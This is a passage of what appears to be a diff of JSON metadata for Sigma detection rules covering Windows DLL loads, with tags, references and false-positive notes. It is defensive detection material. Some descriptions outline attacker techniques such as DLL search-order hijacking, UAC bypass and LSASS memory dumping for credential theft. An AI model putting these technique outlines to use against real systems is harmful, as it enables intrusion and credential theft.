"image_load_side_load_dbghelp_dll.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "value": "System DLL Sideloading From Non System Locations", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/14", - "filename": "image_load_side_load_from_non_system_location.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", - "level": "medium", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "value": "Microsoft Office DLL Sideload", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/17", - "filename": "image_load_side_load_office_dlls.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", - "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", - "value": "SCM DLL Sideload", - "meta": { - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/12/01", - "filename": "image_load_side_load_scm.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", - "value": "Third Party Software DLL Sideloading", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/17", - "filename": "image_load_side_load_third_party.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "value": "VMGuestLib DLL Sideload", - "meta": { - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/12/01", - "filename": "image_load_side_load_vmguestlib.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "FP could occure if the legitimate version of vmGuestLib already exists on the system" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", - "value": "Web Browsers DLL Sideloading", - "meta": { - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/08/17", - "filename": "image_load_side_load_web_browsers.yml", - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects SILENTTRINITY stager use", - "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", - "value": "SILENTTRINITY Stager Execution - DLL", - "meta": { - "refs": [ - "https://github.com/byt3bl33d3r/SILENTTRINITY", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071" - ], - "creation_date": "2019/10/22", - "filename": "image_load_silenttrinity_stage_use.yml", - "author": "Aleksey Potapov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detect DLL Load from Spooler Service backup folder", - "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", - "value": "Windows Spooler Service Suspicious Binary Load", - "meta": { - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/ly4k/SpoolFool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675", - "cve.2021.34527" - ], - "creation_date": "2021/06/29", - "filename": "image_load_spoolsv_dll_load.yml", - "author": "FPT.EagleEye, Thomas Patzke (improvements)", - "level": "informational", - "falsepositive": [ - "Loading of legitimate driver" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", - "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", - "value": "Suspicious Load of Advapi31.dll", - "meta": { - "refs": [ - "https://github.com/hlldz/Phant0m", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2022/02/03", - "filename": "image_load_susp_advapi32_dll.yml", - "author": "frack113", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", - "value": "Cmstp Suspicious DLL Load", - "meta": { - "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], - "creation_date": "2022/08/30", - "filename": "image_load_susp_cmstp.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", - "value": "Load of dbghelp/dbgcore DLL from Suspicious Process", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", - "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", - "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/10/27", - "filename": "image_load_susp_dbghelp_dbgcore_load.yml", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", - "value": "DLL Load By System Process From Suspicious Locations", - "meta": { - "refs": [ - "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2022/07/17", - "filename": "image_load_susp_dll_load_system_process.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "value": "Fax Service DLL Search Order Hijack", - "meta": { - "refs": [ - "https://windows-internals.com/faxing-your-way-to-system/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2020/05/04", - "filename": "image_load_susp_fax_dll.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects any assembly DLL being loaded by an Office Product", - "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "value": "dotNET DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects CLR DLL being loaded by an Office Product", - "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "value": "CLR DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects any GAC DLL being loaded by an Office Product", - "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "value": "GAC DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DSParse DLL being loaded by an Office Product", - "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "value": "Active Directory Parsing DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_dsparse_dll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects Kerberos DLL being loaded by an Office Product", - "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "value": "Active Directory Kerberos DLL Loaded Via Office Applications", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_office_kerberos_dll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", - "value": "Python Py2Exe Image Load", - "meta": { - "refs": [ - "https://www.py2exe.org/", - "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.002" - ], - "creation_date": "2020/05/03", - "filename": "image_load_susp_python_image_load.yml", - "author": "Patrick St. John, OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects CLR DLL being loaded by an scripting applications", - "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", - "value": "CLR DLL Loaded Via Scripting Applications", - "meta": { - "refs": [ - "https://github.com/tyranid/DotNetToJScript", - "https://thewover.github.io/Introducing-Donut/", - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2020/10/14", - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", - "author": "omkar72, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for processes loading System.Drawing.ni.dll. This could be an indicator of potential Screen Capture.", - "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", - "value": "Suspicious System.Drawing Load", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2020/05/02", - "filename": "image_load_susp_system_drawing_load.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "value": "Possible Process Hollowing Image Loading", - "meta": { - "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2018/01/07", - "filename": "image_load_susp_uncommon_image_load.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Very likely, needs more tuning" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the image load of VSS DLL by uncommon executables", - "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "value": "Image Load of VSS Dll by Uncommon Executable", - "meta": { - "refs": [ - "https://github.com/ORCx41/DeleteShadowCopies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/10/31", - "filename": "image_load_susp_vss_dll_load.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "value": "Image Load of VSS_PS.dll by Uncommon Executable", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", - "https://twitter.com/am0nsec/status/1412232114980982787", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/07/07", - "filename": "image_load_susp_vss_ps_load.yml", - "author": "Markus Neis, @markus_neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL's Loaded Via Word Containing VBA Macros", - "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", - "value": "VBA DLL Loaded Via Microsoft Word", - "meta": { - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/02/19", - "filename": "image_load_susp_winword_vbadll_load.yml", - "author": "Antonlovesdnb", - "level": "high", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "value": "Svchost DLL Search Order Hijack", - "meta": { - "refs": [ - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" - ], - "creation_date": "2019/10/28", - "filename": "image_load_svchost_dll_search_order_hijack.yml", - "author": "SBousseaden", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", - "uuid": "49329257-089d-46e6-af37-4afce4290685", - "value": "SharpEvtMute Imphash EvtMuteHook Load", - "meta": { - "refs": [ - "https://github.com/bats3c/EvtMute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/09/07", - "filename": "image_load_sysmon_disable_sharpevtmute.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other DLLs with that import hash" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "value": "Time Travel Debugging Utility Usage - Image", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/mattifestation/status/1196390321783025666", - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" - ], - "creation_date": "2020/10/06", - "filename": "image_load_tttracer_mod_load.yml", - "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", - "level": "high", - "falsepositive": [ - "Legitimate usage by software developers/testers" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", - "value": "UAC Bypass Using Iscsicpl - ImageLoad", - "meta": { - "refs": [ - "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", - "https://twitter.com/wdormann/status/1547583317410607110", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2022/07/17", - "filename": "image_load_uac_bypass_iscsicpl.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to load dismcore.dll after dropping it", - "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "value": "UAC Bypass With Fake DLL", - "meta": { - "refs": [ - "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" - ], - "creation_date": "2020/10/06", - "filename": "image_load_uac_bypass_via_dism.yml", - "author": "oscd.community, Dmitry Uchakin", - "level": "high", - "falsepositive": [ - "Actions of a legitimate telnet client" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", - "value": "UIPromptForCredentials DLLs", - "meta": { - "refs": [ - "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", - "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" - ], - "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" - ], - "creation_date": "2020/10/20", - "filename": "image_load_uipromptforcreds_dlls.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Other legitimate processes loading those DLLs in your environment." - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", - "value": "Unsigned Image Loaded Into LSASS Process", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/10/22", - "filename": "image_load_unsigned_image_loaded_into_lsass.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Valid user connecting using RDP" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", - "value": "APT PRIVATELOG Image Load Pattern", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/09/07", - "filename": "image_load_usp_svchost_clfsw32.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Rarely observed" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "value": "VMware Xfer Loading DLL from Nondefault Path", - "meta": { - "refs": [ - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/02", - "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "value": "WMIC Loading Scripting Libraries", - "meta": { - "refs": [ - "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", - "https://twitter.com/dez_/status/986614411711442944", - "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1220" - ], - "creation_date": "2020/10/17", - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", - "value": "Wmiprvse Wbemcomn DLL Hijack", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/10/12", - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects non wmiprvse loading WMI modules", - "uuid": 